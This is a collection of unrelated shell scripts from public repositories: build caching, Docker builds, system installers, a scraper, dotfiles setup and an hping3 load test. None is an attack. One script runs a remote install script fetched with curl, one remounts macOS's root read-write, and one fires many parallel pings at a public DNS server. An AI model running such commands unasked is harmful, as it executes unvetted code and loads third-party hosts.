Shell
|
rokibhasansagar/builder_demo
|
/ccashier.sh
|
UTF-8
| 837
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
ccache_task="${1}" # upload/download
CCache_URL="https://gdrive.phantomzone.workers.dev/0:/mido_ccache/ccache.tgz"
mkdir -p /home/runner/.cache/ccache /home/runner/.config/rclone
cd /home/runner/.cache/
if [[ ${ccache_task} =~ upload ]]; then
printf "Compressing ccache data...\n"
tar -I "pigz -k -3" -cf ccache.tgz ccache
du -sh ccache.tgz
printf "Setting up rclone and uploading...\n"
echo "${RClone_Config}" > /home/runner/.config/rclone/rclone.conf
rclone delete td:/mido_ccache/ccache.tgz 2>/dev/null || true
rclone copy ccache.tgz td:/mido_ccache/ --progress
rm -rf ccache.tgz
elif [[ ${ccache_task} =~ download ]]; then
printf "Downloading previous ccache...\n"
aria2c -c -x8 -s16 "${CCache_URL}"
printf "Expanding ccache files...\n"
tar -I "pigz" -xf ccache.tgz
rm -rf ccache.tgz
fi
| true
|
1e03953a743c43053b6fea2046b91b6aa1f3abf4
|
Shell
|
andrius/xiringuito
|
/scripts/client-preexec.sh
|
UTF-8
| 270
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#
# Execute *before* doing anything
#
if [[ "$(sha1sum discover-routes | cut -f1 -d' ')" == "246d9bbeded14ef58e5bc103af0f8c2e8b2e8cf2" ]]; then
echo "!!! Rewriting stale 'discover-routes' script"
cp discover-routes.aws.example discover-routes
fi
| true
|
32cfadcd1e9d3c64e547fc0b4fac344d6aa25acf
|
Shell
|
rhardin/chess_scripts
|
/twic/createBigPgnFile.sh
|
UTF-8
| 352
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
echo "archive files..."
for file in `echo *.zip`; do
cp ${file} archive/${file}
done
echo "unzipping files..."
for file in `echo *.zip*`; do
unzip ${file}
rm ${file}
done
echo "writing big.png..."
cat *.pgn > big.pgn
rm twic*.pgn
for x in `echo twic*`; do
cat $x/games/*.pgn >> big.pgn
rm -rf $x
done
echo "done"
| true
|
d0015e192069896bd281e04ab3fc5b64d74674a5
|
Shell
|
tectronics/archlive.mkarchlive
|
/profiles/chakra/overlay/usr/share/tribe/scripts/job-initialize-target
|
UTF-8
| 2,099
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
job_initialize_target()
{
# initialize error handling
trap error_handler ERR
msg_job_start "job_initialize_target"
# recreate some needed dirs
msg "regenerating special directories"
rm -v -rf ${mountpoint}/sys ${mountpoint}/proc ${mountpoint}/dev
mkdir -p -v -m 1777 ${mountpoint}/tmp
mkdir -p -v -m 1777 ${mountpoint}/var/tmp
mkdir -p -v ${mountpoint}/var/log/old
mkdir -p -v ${mountpoint}/var/lock/sane
mkdir -p -v ${mountpoint}/boot/grub
mkdir -p -v ${mountpoint}/usr/lib/locale
mkdir -p -v ${mountpoint}/usr/share/icons/default
mkdir -p -v ${mountpoint}/media
mkdir -p -v ${mountpoint}/mnt
mkdir -v ${mountpoint}/sys
mkdir -v ${mountpoint}/proc
# create basic devices on the target
msg "creating basic devices"
mkdir -v ${mountpoint}/dev
mknod ${mountpoint}/dev/console c 5 1
mknod ${mountpoint}/dev/null c 1 3
mknod ${mountpoint}/dev/zero c 1 5
# ensure correct permission on /tmp and /var/tmp
msg "setting permissions on /tmp and /var/tmp"
chmod -v 777 ${mountpoint}/var/tmp
chmod -v o+t ${mountpoint}/var/tmp
chmod -v 777 ${mountpoint}/tmp
chmod -v o+t ${mountpoint}/tmp
# install resolv.conf
msg "copying /etc/resolv.conf"
cp -vf /etc/resolv.conf ${mountpoint}/etc/resolv.conf
# add basic configs for root
msg "installing configs for root"
cp -vf /etc/skel/.bashrc ${mountpoint}/root/.bashrc
cp -vf /etc/skel/.bash_profile ${mountpoint}/root/.bash_profile
cp -vf /etc/skel/.xinitrc ${mountpoint}/root/.xinitrc
cp -vf /etc/skel/.xsession ${mountpoint}/root/.xsession
cp -vf /etc/skel/local.conf ${mountpoint}/etc/fonts/local.conf
# Set mouse theme for root
msg "Setting mouse theme for root"
cp -vf /usr/share/icons/default/index.theme ${mountpoint}/usr/share/icons/default/index.theme
# Proper kdmrc
sed -i -e 's~^.*Theme=/.*~Theme=/usr/share/apps/kdm/themes/ashoc~' ${mountpoint}/usr/share/config/kdm/kdmrc
sed -i -e 's~^.*#AntiAliasing=.*~AntiAliasing=true~' ${mountpoint}/usr/share/config/kdm/kdmrc
sed -i -e 's~^.*#TerminateServer=.*~TerminateServer=true~' ${mountpoint}/usr/share/config/kdm/kdmrc
msg_job_done
}
| true
|
70536260d1a765cbc53208df7c792ec1bc799b35
|
Shell
|
partovengine/evaluation
|
/scripts/evaluate-hping-ES3.2.sh
|
UTF-8
| 1,175
| 3.375
| 3
|
[] |
no_license
|
startinground=$1
N=4
. functions.sh
MAX_FLOWS=154
STEP=9
cd ../outputs/
echo 'n=$1; i=$2; round=$3;' > run-hping.temp
echo 'hping3 -c 60 -i 1 -d 1024 -1 4.2.2.4 > hping3-multi-$n-flow-$i-raw-round-${round}.txt 2>&1 || true;' >> run-hping.temp
chmod +x run-hping.temp
function hping_multi_instances {
local n=$1
local round=$2
local i;
for((i=0;$i<$n;i=$i+1)); do
echo "/usr/bin/time --format=\"%M\" ./run-hping.temp $n $i $round 2>mem-${i}.temp &"
done > hping3-multi-${n}-round-${round}.sh
echo "wait" >> hping3-multi-${n}-round-${round}.sh
chmod +x hping3-multi-${n}-round-${round}.sh
/usr/bin/time --format="%P" ./hping3-multi-${n}-round-${round}.sh 2>cpu-overall.temp
local totalmaxmem=0
for((i=0;$i<$n;i=$i+1)); do
local memval=$(cat mem-${i}.temp);
let totalmaxmem="$totalmaxmem+$memval";
done
echo "$(cat cpu-overall.temp) $totalmaxmem" > hping3-multi-$n-cpu-memory-round-${round}.log
}
for((round=$startinground;$round<=$N;round=$round+1)); do
echo "Running hping3...Round #${round}.............................."
for((i=1;$i<=$MAX_FLOWS;i=$i+$STEP)); do
hping_multi_instances $i $round
echo "The ${i} hping3 subscenario is finished."
done
done
| true
|
bd7126e95c8f6afefc828c497dfeb3a8d8b6da96
|
Shell
|
TelephoneTan/HP-Pavilion-bc015tx-Hackintosh
|
/Obsoleted/ALC295PlugFix/alc_fix/uninstall.command
|
UTF-8
| 1,223
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
echo "Uninstalling ALCPlugFix. Root user is required."
# detect if SIP disabled
sipstatus=$(csrutil status)
if [[ $sipstatus =~ 'enable' ]]; then
echo "SIP is enabled, please consider disable it by setting"
echo "csr-active-config to 7F000000 (DATA) and then reboot"
echo "or running csrutil disable in terminal under recovery mode."
exit 1
elif [[ $sipstatus =~ 'unknown' ]]; then
echo "SIP status is unknown, please consider disable it by setting"
echo "csr-active-config to 7F000000 (DATA) and then reboot"
echo "or running csrutil disable in terminal under recovery mode."
exit 1
fi
# check if the root filesystem is writeable (starting with macOS 10.15 Catalina, the root filesystem is read-only by default)
if sudo test ! -w "/"; then
echo "Root filesystem is not writeable. Remounting as read-write and restarting Finder."
sudo mount -uw /
sudo killall Finder
fi
echo "Removing files..."
sudo rm -v /usr/bin/ALCPlugFix
sudo rm -v /usr/bin/alc-verb
sudo launchctl unload -w /Library/LaunchDaemons/good.win.ALCPlugFix.plist
sudo launchctl remove good.win.ALCPlugFix
sudo rm -v /Library/LaunchDaemons/good.win.ALCPlugFix.plist
echo "Done!"
exit 0
| true
|
49d50b5e9b1227c61acd5f75e99f9da7b82b92af
|
Shell
|
arai-a/binjs-fbssdc
|
/test.sh
|
UTF-8
| 582
| 3.375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
# Integration test for round-tripping a file.
prog_dir=$(dirname $(realpath $0))
tmp_dir=$(mktemp -d)
pushd $tmp_dir > /dev/null
$prog_dir/bpy.py make-dict $prog_dir/test-data/y5R7cnYctJv.js.dump my.dict
$prog_dir/bpy.py optimize-ast $prog_dir/test-data/three.min.js.dump three.dump
$prog_dir/bpy.py encode-ast my.dict three.dump three.bin
$prog_dir/bpy.py decode-ast my.dict three.bin three.out
if [[ $(diff three.dump three.out) ]]; then
echo 'test fails, decoded files differ'
exit 1
else
echo 'test passed'
fi
popd > /dev/null
rm -rf $tmp_dir
| true
|
3b392e7962a00626fb71ff9724333617a42d353e
|
Shell
|
newhavengill/EnvironmentManager
|
/db/oracle/common/bin/dbargsSansDatabase
|
UTF-8
| 733
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/sh
NAME=`basename "$0"`
USAGE="usage: $NAME -e <env name> [database]"
ENV_NAME="$2"
DB_NAME="$3"
##########################################################
# Parse Args
if [ $# -ne 3 ] ; then
echo "$USAGE"
exit 1
fi
if [ "$1" != "-e" ] ; then
echo "$USAGE"
exit 1
fi
##########################################################
#
host=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.host"`
username=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.username"`
password=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.password"`
port=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.port"`
domain=`ueConfigValueForKey "$DB_NAME"".""$ENV_NAME" "db.domain"`
echo "$username/$password@//$host:$port/$domain"
| true
|
560d27d5b5c276cb65a9f35a6e7b0aa8d00dd708
|
Shell
|
manishbansal8843/cloud-k8s-cluster
|
/install.sh
|
UTF-8
| 681
| 3.671875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -e
echo "=====================================Welcome to cloud k8s cluster installer====================================="
echo "Usage: NUM_OF_NODES=3 CLOUD_PROVIDER=gcp GCP_PROJECT_NAME=project-name-value ./install.sh"
: ${NUM_OF_NODES:=3}
: ${CLOUD_PROVIDER:="gcp"}
WORKER_NODES=$(($NUM_OF_NODES - 1))
if [[ $NUM_OF_NODES -lt 1 ]]; then
echo "NUM_OF_NODES cannot be less than 1"
exit 1
elif ! [[ -f $CLOUD_PROVIDER/entrypoint.sh ]]; then
echo "$CLOUD_PROVIDER cloud provider is not supported as of now. Kindly check documentation for supported cloud providers."
exit 2
fi
echo "Going to install k8s cluster on $CLOUD_PROVIDER"
. $CLOUD_PROVIDER/entrypoint.sh
| true
|
b9a5866e950ecb944a73c521c5d2b384a4d38e38
|
Shell
|
kanoop640/ShellProgram
|
/Basic/userInputMulti.sh
|
UTF-8
| 327
| 3.109375
| 3
|
[] |
no_license
|
echo Enter name :
read name
echo Entered name is : $name
read -p "username :" user_var
echo "username is :" $user_var
read -sp "Password :" pass_var
echo
echo Password is : $pass_var
echo "Enter multiple name"
read -a names
echo "Names is :"${names[0]}, ${names[1]}
echo Enter Company name :
read
echo Company is : $REPLY
| true
|
bbbf45266c12541f7d503c89bf56709e71d723f2
|
Shell
|
ryanwoodsmall/shell-ish
|
/bin/roku-hdhomerun-ply.sh
|
UTF-8
| 419
| 3
| 3
|
[] |
no_license
|
#!/bin/bash
export PATH="/opt/python/python-2.7/bin:${PATH}"
export PATH="${PATH}:/usr/local/sbin:/usr/local/bin"
export PLYPORT="6969"
export PLYDIR="${HOME}/downloads/github/themacks/ply"
export PLYLOG="/tmp/ply.log"
test -e ${PLYDIR} || {
echo "no such dir ${PLYDIR}"
exit 1
}
pushd ${PLYDIR}
test -e ply.py || {
echo "no such file ${PWD}/ply.py"
exit 1
}
python2.7 ply.py ${PLYPORT} 2>&1 | tee ${PLYLOG}x
| true
|
897a8a427bbed88aae9068a88948895e3f6f2651
|
Shell
|
Amergoli/qa_chatbots_exercises
|
/exercise_4/docker_example/boot.sh
|
UTF-8
| 159
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
if [ -n $SERVER_PORT ]
then
echo Starting container $NAME on port $SERVER_PORT
exec uvicorn $NAME:app --reload --host 0.0.0.0 --port=80
fi
| true
|
b41fd07a209141da3183bfdd28c4da50528f8553
|
Shell
|
EngineerBetter/developer-training-class-apps
|
/ci/unpause-pipelines.sh
|
UTF-8
| 373
| 2.609375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
set -e
if [ "$1" = "" ]; then
echo $0: usage: $0 target
exit
fi
target=$1
this_directory=`dirname "$0"`
fly -t $target unpause-pipeline -p rate-limit-route-service
fly -t $target unpause-pipeline -p rest-data-service
fly -t $target unpause-pipeline -p web-ui
fly -t $target unpause-pipeline -p uaa
fly -t $target unpause-pipeline -p uaa-guard-proxy
| true
|
3a7074ebeb0c387d8f54566e183e8f062da8a961
|
Shell
|
rh9/wget
|
/script/wget/xakep_ru_s.sh
|
UTF-8
| 1,943
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/sh
source /usr/script/wget/config.cfg
cd /var/www/html/xakep.ru
mkdir `date +%Y.%m.%d`
cd `date +%Y.%m.%d`
wget -HEkp -nc -nd -l 0 -e robots=off xakep.ru
sleep 1
mkdir i
mkdir post
#ัะบะฐัะธะฒะฐะฝะธะต ัััะปะพะบ
# for loop in `cat ../index.html | sed -e 's/\/i\//\ni\//g' | grep Images | awk -F \' '{ print $1 }'`
# do
# echo 'wget -HEkp -nd -l 0 -e robots=off "mobiledevice.ru/$loop"'
# done
#ะบะพะผะตะฝัะธััะตะผ ัะบัะธะฟัั
cat index.html | sed -e '
s/<script/<!--script/g;
s/<\/script>/<\/script-->/g' > index2.html
# cat index2.html | sed -e '
# s/<a/<!--a/g;
# s/<\/a>/<\/a-->/g' > index1.html
#http://nizhniynovgorod.irr.ru/advert/45898683/
#ะฟะตัะตะฝะพั ัััะปะพะบ ะฝะฐ ะฝะพะฒัะต ัััะพะบะธ
cat index2.html | sed -e 's/http:/\nhttp:/g' | grep xakep.ru/post | awk -F \" '{ print $1 }' | egrep -v asp | egrep -v jpg | sort -u > links.txt
cd post
#ัะบะฐัะธะฒะฐะฝะธะต ัััะปะพะบ
for loop in `cat ../index2.html | sed -e 's/http:/\nhttp:/g' | grep xakep.ru/post | awk -F \" '{ print $1 }' | egrep -v asp | egrep -v jpg | sort -u | awk -F \/ '{ print $5 }'`
do
mkdir $loop
cd $loop
wget -HEkp -nd -l 0 -e robots=off "xakep.ru/post/$loop"
cd ../
done
cd ../
#ะธะทะผะตะฝะตะฝะธะต ัััะปะพะบ ะฝะฐ ะปะพะบะฐะปัะฝัะต
cat index2.html | sed -e 's/http:\/\/www.xakep.ru\///g' > index.html
mkdir i/img_new
#cd i/img_new
#wget -HEkp -nc -nd -l 0 -e robots=off http://www.xakep.ru/i/img_new
#cd ../../../
tar -cjf `date +%Y.%m.%d`.tar.bz2 `date +%Y.%m.%d`/*
if [ ! -e /var/ftp/download/usb_disk/xakep.ru ]
then
mkdir /var/ftp/download/usb_disk/xakep.ru
fi
mv `date +%Y.%m.%d`.tar.bz2 /var/ftp/download/usb_disk/xakep.ru/
find /var/www/xakep.ru -name '*' -mtime +7 -exec rm -f {} ;
find /var/ftp/download/usb_disk/xakep.ru -name '*.tar.bz2' -mtime +14 -exec rm -f {} ;
| true
|
51ccd4fbbb5ec003aca0c7cc12a7acefd9bcac7b
|
Shell
|
rafaelflorindo/shellScript
|
/operadorAtribuicaoSimples.sh
|
UTF-8
| 557
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
#script: operadorAtribicaoSimples.sh
#atribuicao de valores direta nas variaveis
x=8
y=18
z=38
echo "** Valores Iniciais. **"
echo "X = $x"
echo "Y = $y"
echo "Z = $z"
x=$y;
echo "** Valores Alterados. **"
echo "Valores de X Alterado = $x"
x=$((y=z))
echo "Valores de X Alterado = $x"
echo "Valores de Y Alterado = $y"
echo "Valores de z Alterado = $z"
#** Valores Iniciais. **
#X = 8
#Y = 18
#Z = 38
#** Valores Alterados. **
#Valores de X Alterado = 18
#Valores de X Alterado = 38
#Valores de Y Alterado = 38
#Valores de z Alterado = 38
| true
|
b15ca45151bd8808f0916d2db9929a6008ca5e1d
|
Shell
|
mandylr/problem-set-2
|
/run.sh
|
UTF-8
| 3,406
| 3.609375
| 4
|
[] |
no_license
|
#! bin/usr/env bash
## Question 1
#Use BEDtools intersect to identify the size of the largest overlap between
#CTCF and H3K4me3 locations.
datasets='/Users/mandyricher/Desktop/Classes/GenomicsWorkshop/data-sets'
H3K4="$datasets/bed/encode.h3k4me3.hela.chr22.bed.gz"
TFBS="$datasets/bed/encode.tfbs.chr22.bed.gz"
gzcat $TFBS | awk '$4 == "CTCF"' \
| bedtools sort -i - > data/CTCF.bed
answer1=$(gzcat $H3K4 \
| bedtools sort -i - \
| bedtools intersect -a data/CTCF.bed -b - -wo \
| awk '{print $NF}' \
| sort -nr \
| head -n1)
echo "answer-1: $answer1"
## Question 2
#Use BEDtools to calculate the GC content of nucleotides 19,000,000 to
#19,000,500 on chr22 of `hg19` genome build. Report the GC content
#as a fraction (e.g., 0.50).
#Use bedtools nuc -fi <fasta> -bed <bed> contains ranges to extract
#You want column 2 - %GC content, but may need to change it to a fraction
HG19="$datasets/fasta/hg19.chr22.fa"
GC="/Users/mandyricher/Desktop/Classes/GenomicsWorkshop/problem-set-2/data/GC.bed"
echo -e "chr22\t19000000\t19000500" > $GC
answer2=$(bedtools nuc -fi $HG19 -bed $GC \
| cut -f5 \
| tail -n1)
echo "answer-2: $answer2"
## Question 3
#Use BEDtools to identify the length of the CTCF ChIP-seq peak (i.e.,
#interval) that has the largest mean signal in `ctcf.hela.chr22.bg.gz`.
#map, mean
#gunzip $datasets/bedtools/ctcf.hela.chr22.bg
CTCF="$datasets/bedtools/ctcf.hela.chr22.bg"
answer3=$(bedtools map -a data/CTCF.bed -b $CTCF -c 4 -o mean \
| sort -k5n \
| tail -n1 \
| awk '{print $3 - $2}')
echo "answer-3: $answer3"
## Question 4
#Use BEDtools to identify the gene promoter (defined as 1000 bp upstream of
#a TSS) with the highest median signal in `ctcf.hela.chr22.bg.gz`. Report
#the gene name (e.g., 'ABC123')
#promotors == 1000 bp upstream
#bedtools flank -l(left) -s(strand)
#map median
TSS="$datasets/bed/tss.hg19.chr22.bed.gz"
GENOME="$datasets/genome/hg19.genome"
answer4=$(gzcat $TSS \
| bedtools flank -s -i - -g $GENOME -l 1000 -r 0 \
| bedtools sort -i - \
| bedtools map -a - -b $CTCF -c 4 -o median \
| sort -k7n \
| tail -n1\
| cut -f4)
echo "answer-4: $answer4"
## Question 5
#Use BEDtools to identify the longest interval on `chr22` that is not
#covered by `genes.hg19.bed.gz`. Report the interval like `chr1:100-500`.
#complement, given input intervals, it will give you back all the
#intervals not covered by the input
#Must also give it a genome file
GENES="$datasets/bed/genes.hg19.bed.gz"
awk '$1 == "chr22"' $GENOME > data/chr22.genome
answer5=$(gzcat $GENES \
| awk '$1 == "chr22"' \
| bedtools sort -i - \
| bedtools complement -i - -g data/chr22.genome \
| awk '{print $1, $2, $3, $3 - $2}'\
| sort -k4n \
| tail -n1 \
| awk '{print $1":"$2"-"$3}')
echo "answer-5: $answer5"
## Question 6 (extra credit)
#Use one or more BEDtools that we haven't covered in class. Be creative.
#This uses bedtools reldist to find the relative distance between
#transcription factor binding sites and transcription start sites or genes
#I will make a plot of the information.
gzcat $TSS > data/TSS.bed
gzcat $TFBS \
| bedtools reldist -a - -b $TSS \
> TSS_TFBS_reldist.tsv
gzcat $GENES \
| awk '$1 == "chr22"' \
| bedtools sort -i - \
| bedtools reldist -a $TFBS -b - \
> GENES_TFBS_reldist.tsv
echo "answer-6: see R plot"
| true
|
9de5d867b38a70e7e8d05a15cdb5387afd7c1f49
|
Shell
|
makgwalem/JanTrainingMaterial
|
/variablesubsituation.sh
|
UTF-8
| 383
| 2.625
| 3
|
[] |
no_license
|
echo ${var:-"Variable is not set"}
echo "1 - value of var is ${var}"
echo ${var:="Variable is not set"}
echo "2 - value of var is ${var}"
unset var
echo ${var:+"This is the default value"}
echo "3 - value of var is $var"
var="Prefix"
echo ${var:+"Thius is the default value"}
echo "3 - value of var is $var"
echo ${var:?"Print this messgae"}
echo "5 - value of var is ${var}"
| true
|
def30424b2763179d96658c4d568b172931ceedf
|
Shell
|
get-it-live/system-tools
|
/builder/build.sh
|
UTF-8
| 2,581
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
#set -e
repo=$1
branch=$2
mode=$3
dockerfile=$4
taskId=$5
auth=$6
cache=$7
force=$8
# Expand content to 'deploy' repo
deployDir="/git/${repo}/${mode}"
mkdir -p ${deployDir}
cd ${deployDir}
function finish
{
echo $1 | curl -k -s -XPOST -d @- -u ${auth} -H 'Content-Type: application/json' -H "Token: ${APIKEY}" \
"http://www.getitlive.io/api/Hooks/Repository/${taskId}/Done?success=false&image=${image}&commit=${remote_sha}"
echo "ERROR : $1"
exit 1
}
### Commented out because e already pull in a previous stage, from app/Build.PullRepo()
#checkout=""
#checkout="$(GIT_WORK_TREE=${deployDir} git checkout -f ${branch} || cd ${deployDir} && git checkout -f ${branch} 2>&1)"
#if [ $? -ne 0 ]
#then
# echo "Repository checkout failed, aborting build."
# finish "$checkout"
# exit 1
#fi
output=""
lastline=""
if [ "${cache}" == "False" ]; then
useCache="--no-cache"
fi
test -z "${useCache}" && echo " ***** Building new Image (using cache)..." || echo " ***** Building new Image (not using cache)..."
# Send/Publish Dockerfile
dockerfile_path="./${dockerfile}/Dockerfile"
test -f ${dockerfile_path} || finish "Could not find Dockerfile in specified path '${dockerfile_path}'"
$(curl -k -s -XPOST --data-binary @${dockerfile_path} -u ${auth} -H 'Content-Type: text/plain' -H "Token: ${APIKEY}" \
"http://www.getitlive.io/api/Hooks/Repository/${taskId}/Dockerfile" 2>&1)
#build_dockerfile=$(docker -H tcp://127.0.0.1:5555 build -q ${useCache} "${dockerfile}" 2>&1)
#if [ $? -ne 0 ]
#then
# finish($build_dockerfile)
#fi
build_dockerfile=""
build_dockerfile=$(docker -H tcp://127.0.0.1:5555 build -q ${useCache} "${dockerfile}" 2>&1 | {
while IFS= read -r line
do
echo " $line"
output+="\\n${line}"
lastline="$line"
done
image="`echo ${lastline} | awk '{print $3}'`"
# Publish Dockerfile
dockerfile_path="./${dockerfile}/Dockerfile"
curl -k -s -XPOST --data-binary @${dockerfile_path} -u ${auth} -H 'Content-Type: text/plain' -H "Token: ${APIKEY}" \
"http://www.getitlive.io/api/Hooks/Repository/${taskId}/Dockerfile"
sleep 5
docker -H tcp://127.0.0.1:5555 inspect ${image} || $(finish "Could not find built image '${image}'"; exit 1)
echo " ***** Publishing ${image} into your '${repo}' images repository..."
echo ${output} | curl -k -s -XPOST -d @- -u ${auth} -H 'Content-Type: application/json' -H "Token: ${APIKEY}" \
"http://www.getitlive.io/api/Hooks/Repository/${taskId}/Done?success=true&image=${image}&commit=${remote_sha}"
} 2>&1)
if [ $? -ne 0 ]
then
finish "$build_dockerfile"
fi
| true
|
c6ed4dda1945c1ab2b947d26f36b56c2ef63e1b3
|
Shell
|
sscswapnil/Linux_Scripting_My_Tutorials
|
/Simple_Mathematical_Operation/Math.sh
|
UTF-8
| 498
| 3.828125
| 4
|
[] |
no_license
|
#! /bin/bash
read -p "Enter first Number :" n1
read -p "Enter Second Number :" n2
echo ""
echo "1 --> Addition Operation"
echo "2 --> Subtraction Operation"
echo "3 --> Multiplication Operation"
echo "4 --> Division Operation"
read -p "Choose the option 1|2|3|4: " option
case $option in
1)
echo "$n1+$n2=$((n1+n2))"
;;
2)
echo "$n1-$n2=$((n1-n2))"
;;
3)
echo "$n1*$n2=$((n1*n2))"
;;
4)
echo "$n1/$n2=$((n1/n2))"
;;
*)
echo "Enter 1|2|3|4 Option Only. Execute Again"
esac
| true
|
21fc911501b03700319e5231703d72c129979aaf
|
Shell
|
matthewpi/dotfiles-old
|
/setup.sh
|
UTF-8
| 4,287
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
print() {
echo -e $1
}
command_exists() {
command -v "$@" >/dev/null 2>&1
}
get_latest_release() {
curl --silent "https://api.github.com/repos/$1/releases/latest" |
grep '"tag_name":' |
sed -E 's/.*"([^"]+)".*/\1/'
}
install_starship() {
wget https://github.com/starship/starship/releases/download/${VERSION}/starship-x86_64-unknown-linux-musl.tar.gz
tar xvzf $HOME/starship-x86_64-unknown-linux-musl.tar.gz
mv $HOME/starship $HOME/.local/bin/starship
rm $HOME/starship-x86_64-unknown-linux-musl.tar.gz $HOME/target -rf
}
# Root User Detection
if [ "$EUID" -ne 0 ]; then
print "This script must be ran as the root user."
exit 1
fi
# OS Detection
if [ -f /etc/os-release ]; then
. /etc/os-release
OS=$ID
else
print "Unable to detect operating system."
exit 1
fi
# Because I'm a stuck-up asshole who only supports RHEL based OSes
if [ "$OS" != "rhel" ] && [ "$OS" != "fedora" ] && [ "$OS" != "centos" ]; then
print "You must be on a RHEL based operating system to use this."
exit 1
fi
if [ "$SUDO_USER" == "root" ]; then
# Set the HOME variable to be the root directory
HOME="/root"
else
# Make the HOME variable use the proper user directory
HOME="/home/$SUDO_USER"
# Because if you don't run it using sudo $SUDO_USER is empty.
if [ "$HOME" == "/home/" ]; then
echo "You must run this script using \`sudo\` even as the root user."
exit 1
fi
fi
# Switch to the user's home directory
cd $HOME
# Update any packages
yum update -y
# Install Curl
rpm -q "curl" &> /dev/null
if [ $? -ne 0 ]; then
print "Installing curl"
yum install curl -y > /dev/null
fi
# Install wget
rpm -q "wget" &> /dev/null
if [ $? -ne 0 ]; then
print "Installing wget"
yum install wget -y > /dev/null
fi
# Install Git
rpm -q "git" &> /dev/null
if [ $? -ne 0 ]; then
print "Installing git"
yum install git -y > /dev/null
fi
# Install ZSH
rpm -q "zsh" &> /dev/null
if [ $? -ne 0 ]; then
print "Installing zsh"
yum install zsh -y > /dev/null
fi
# Get the latest starship version
VERSION=`get_latest_release "starship/starship"`
# Check if starship is already installed
if [ -f "$HOME/.local/bin/starship" ]; then
print "Starship is already installed, checking if an update is available.."
LATEST_VERSION="starship ${VERSION:1}"
CURRENT_VERSION=`starship -V`
# Check if starship is outdated
if [ "$LATEST_VERSION" != "$CURRENT_VERSION" ]; then
print "Updating ${CURRENT_VERSION} to ${LATEST_VERSION}"
rm $HOME/.local/bin/starship -rf
install_starship
else
print "Starship is up to date"
fi
else
print "Installing starship.."
mkdir -p $HOME/.local/bin || true
install_starship
fi
# Install oh-my-zsh
if [ ! -d "$HOME/.oh-my-zsh" ]; then
print "Installing oh-my-zsh"
sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" "" --unattended
fi
# Install zsh-autosuggestions
if [ ! -d "$HOME/.oh-my-zsh/custom/plugins/zsh-autosuggestions" ]; then
git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions
fi
# Install zsh-syntax-highlighting
if [ ! -d "$HOME/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting" ]; then
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting
fi
# Add .bashrc
rm $HOME/.bashrc || true
curl https://raw.githubusercontent.com/matthewpi/dotfiles/master/.bashrc --silent --output $HOME/.bashrc
# Add .hushlogin
if [ ! -f "$HOME/.hushlogin" ]; then
touch $HOME/.hushlogin || true
fi
# Add .zshrc
rm $HOME/.zshrc || true
curl https://raw.githubusercontent.com/matthewpi/dotfiles/master/.zshrc --silent --output $HOME/.zshrc
# Add starship.toml
mkdir $HOME/.config || true
curl https://raw.githubusercontent.com/matthewpi/dotfiles/master/.config/starship.toml --silent --output $HOME/.config/starship.toml
# Add .tmux.conf
rm $HOME/.tmux.conf || true
curl https://raw.githubusercontent.com/matthewpi/dotfiles/master/.tmux.conf --silent --output $HOME/.tmux.conf
# Set ZSH as the user's default shell
usermod --shell $(which zsh) $SUDO_USER
| true
|
6db0c06db3d24f641c84560f1a76269f9edfeb8c
|
Shell
|
zennro/dotfiles-11
|
/zshrc
|
UTF-8
| 2,884
| 3.015625
| 3
|
[] |
no_license
|
ZSH="$HOME/.oh-my-zsh"
ZSH_THEME="agnoster"
COMPLETION_WAITING_DOTS="true"
DEFAULT_USER="dan"
plugins=(vi-mode git git-extras zsh-syntax-highlighting)
source $ZSH/oh-my-zsh.sh
[[ -f $HOME/.bash_aliases ]] && source $HOME/.bash_aliases
if command -v fzf &> /dev/null; then
unalias historygrep
function historygrep {
print -z $(fc -nl 1 | grep -v 'history' | fzf +s -e -q "$*")
}
function fzcmd {
print -z $(printf -rl $commands:t ${(k)functions} ${(k)aliases} | sort | uniq | fzf -e -q "$*")
}
fi
unfunction cd
chpwd() {
emulate -L zsh
ls
}
autoload -U zmv
alias zcp='noglob zmv -C '
alias zln='noglob zmv -L '
alias zmv='noglob zmv '
alias -g L='| less'
alias -g S='| sort'
alias -g SU='| sort | uniq | sort'
alias -g SUC='| sort | uniq -c | sort -n'
alias -g V='| vim -'
alias -g DN='&> /dev/null'
bindkey -v
bindkey '^[[A' history-search-backward
bindkey '^[[B' history-search-forward
bindkey '^[[5~' up-line-or-history
bindkey '^[[6~' down-line-or-history
bindkey '^[[7~' beginning-of-line
bindkey '^[[8~' end-of-line
bindkey '^[[1~' beginning-of-line
bindkey '^[[4~' end-of-line
zle -N fancy-ctrl-z
zle -N delete-in
zle -N change-in
zle -N delete-around
zle -N change-around
bindkey '^Z' fancy-ctrl-z
bindkey -M vicmd 'ca' change-around
bindkey -M vicmd 'ci' change-in
bindkey -M vicmd 'cc' vi-change-whole-line
bindkey -M vicmd 'da' delete-around
bindkey -M vicmd 'di' delete-in
bindkey -M vicmd 'dd' kill-whole-line
fancy-ctrl-z() {
if [[ "$#BUFFER" == 0 ]]; then
bg
zle redisplay
else
zle push-input
fi
}
delete-in() {
local CHAR LCHAR RCHAR LSEARCH RSEARCH COUNT
read -k CHAR
